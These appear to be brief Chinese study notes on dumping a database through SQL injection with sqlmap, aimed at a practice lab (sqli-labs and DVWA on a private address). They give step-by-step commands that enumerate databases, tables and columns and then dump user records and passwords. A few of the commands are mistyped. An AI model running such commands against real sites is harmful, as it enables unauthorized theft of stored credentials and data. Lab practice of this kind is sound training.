爆库
首先发掘SQL注入的点
再通过工具进行自动化扫描
sqlmap -u "http://172.24.108.165:8081/Less-1/?id=1" --dbs
通过数据库名 爆表
sqlmap -u "url" -tables -D dvwa
通过数据表,爆出字段列
sqlmap -u "url" -columns -Tusers -D dvwa
通过字段列,爆出所有表中的记录
qlmap -u "http://172.24.108.165:8081/Less-1/?id=1" --dump -C "user,avatar,user_id,password" -T users -D dvwa;